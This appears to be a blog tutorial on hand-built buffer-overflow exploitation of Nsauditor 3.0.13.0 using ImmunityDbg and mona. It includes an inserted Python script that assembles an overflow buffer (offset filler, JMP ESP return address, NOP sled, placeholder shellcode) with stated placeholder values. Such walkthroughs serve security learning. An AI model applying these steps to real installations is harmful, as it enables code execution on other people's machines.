A few weeks ago we talked about file format fuzzing. Today we will try to find a bug using only the 'manual approach'. ;) Below you will find the details. Here we go...
We will start here:
Somewhere online I found Nsauditor Version 3.0.13.0. I decided it would be good example software to check (and exploit, 'if possible'). So I installed the software and started to...
... simply use the program :) That's the whole point of the 'manual approach'. Check it out: when you use the software, you always understand a little more about how it works and where we can find a possible 'entry point' for our 'exploit'.
That's what I found:
To find the same window: go to Options -> Configuration. There you will find a tab called "Security Events". Yeah. :) So let's add a new 'security event', just like I did on the screen:
('initial' crash)
Call stack:
Preparing a skeleton PoC (pattern generated with: !mona pc 2000):
Now we should be here:
Checking the pattern offset (using: !mona po <EIP value from the crash>):
I modified the skeleton PoC a little to verify the length of the pattern used:
Checking results:
So far, so good. (As you can see, I changed the length of the 'sh' string, because with 1500 * 'C' we could not reach the crash.)
The next thing I decided to do was to find the location of a JMP ESP:
Unfortunately !mona found only 7 pointers. All of them started with 0x00, so my super shellcode was malformed. I decided to restart the app, restart the debugger, restart the OS... but that wasn't the solution. The addresses of the JMP ESP instructions found still started with 0x00, again and again.
After a while I decided to try something else. I restarted ImmunityDbg again and then used right-click -> Search for -> Command:
And that's how I found an address that worked for me:
As you can see, the modified PoC generated a new string, and now we are able to overwrite EIP with the address of JMP ESP.
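As an added example (this is not code from the original post, and the offset, JMP ESP address and shellcode below are hypothetical placeholders, not the real values for Nsauditor), here is a small Python script that reproduces the steps above offline: it generates the same style of cyclic pattern as !mona pc, recovers the offset from the EIP value shown at the crash the way !mona po does, refuses a JMP ESP address that contains a 0x00 byte (the problem with the 7 pointers above, since the input is a text field and a null byte cuts the string short), and assembles the final buffer at the length that triggered the crash.

```python
import struct

# Constructed values for the demo; the post does not publish its real offset or
# JMP ESP address, so these are placeholders and not Nsauditor's.
PATTERN_LENGTH = 2000              # same size as '!mona pc 2000' in the post
EXAMPLE_OFFSET = 1600              # hypothetical distance to the saved return address
EXAMPLE_JMP_ESP = 0x7C9D30D7       # hypothetical JMP ESP address without a 0x00 byte
EXAMPLE_NULL_JMP_ESP = 0x0040ABCD  # hypothetical pointer inside a module loaded at 0x00400000


def cyclic_pattern(length):
    """Metasploit/mona-style pattern 'Aa0Aa1Aa2...'. Every 4-byte window is unique
    within the first 20280 bytes, so whatever lands in EIP pins down its offset."""
    out = bytearray()
    for u in b"ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for l in b"abcdefghijklmnopqrstuvwxyz":
            for d in b"0123456789":
                out += bytes((u, l, d))
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than one unique cycle (20280 bytes)")


def pattern_offset(pattern, eip):
    """Equivalent of '!mona po <EIP>'. The debugger shows EIP as a 32-bit number,
    but the bytes sit in memory little-endian, so pack it before searching."""
    needle = struct.pack("<I", eip)
    off = pattern.find(needle)
    if off == -1:
        raise ValueError("EIP value %#010x not found in pattern" % eip)
    return off


def has_bad_chars(value, bad=b"\x00"):
    """True if the little-endian encoding of the address contains a forbidden byte.
    A 0x00 byte terminates the string the program copies, which is why pointers
    starting with 0x00 cannot be used in this text field."""
    return any(b in bad for b in struct.pack("<I", value))


def build_poc(offset, jmp_esp, shellcode, total_len, nop_len=16):
    """Filler up to EIP, the JMP ESP address, a short NOP sled, the shellcode,
    then padding so the buffer keeps the total length that caused the crash."""
    if has_bad_chars(jmp_esp):
        raise ValueError("JMP ESP address %#010x contains a null byte" % jmp_esp)
    buf = b"A" * offset                   # reaches the saved return address
    buf += struct.pack("<I", jmp_esp)     # overwrites EIP; RET lands on JMP ESP
    buf += b"\x90" * nop_len              # after RET, ESP points right here
    buf += shellcode
    if len(buf) > total_len:
        raise ValueError("payload does not fit in %d bytes" % total_len)
    buf += b"C" * (total_len - len(buf))
    return buf


if __name__ == "__main__":
    pat = cyclic_pattern(PATTERN_LENGTH)
    # Pretend the debugger reported EIP as the pattern bytes at EXAMPLE_OFFSET.
    crashed_eip = struct.unpack("<I", pat[EXAMPLE_OFFSET:EXAMPLE_OFFSET + 4])[0]
    print("EIP %#010x -> offset %d" % (crashed_eip, pattern_offset(pat, crashed_eip)))
    shellcode = b"\xcc" * 4               # INT3 placeholder; real shellcode goes here
    poc = build_poc(EXAMPLE_OFFSET, EXAMPLE_JMP_ESP, shellcode, PATTERN_LENGTH)
    with open("poc.txt", "wb") as f:      # paste the contents into the event field
        f.write(poc)
```

Run it once with the pattern to get the crash, feed the EIP value from the debugger to pattern_offset(), then run it again with the real offset and a JMP ESP address that passes has_bad_chars(); the INT3 placeholder makes it obvious in the debugger whether execution really reached the buffer.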
Next I used Shift+F8 in ImmunityDbg to pass the exception to the program and step over:
I believe it's time to use Shift+F9 ;)
I think that's all for this case. :) Now click the donate button and buy me a coffee ;)
Part 1 of the post can be found here.
See you next time!
Cheers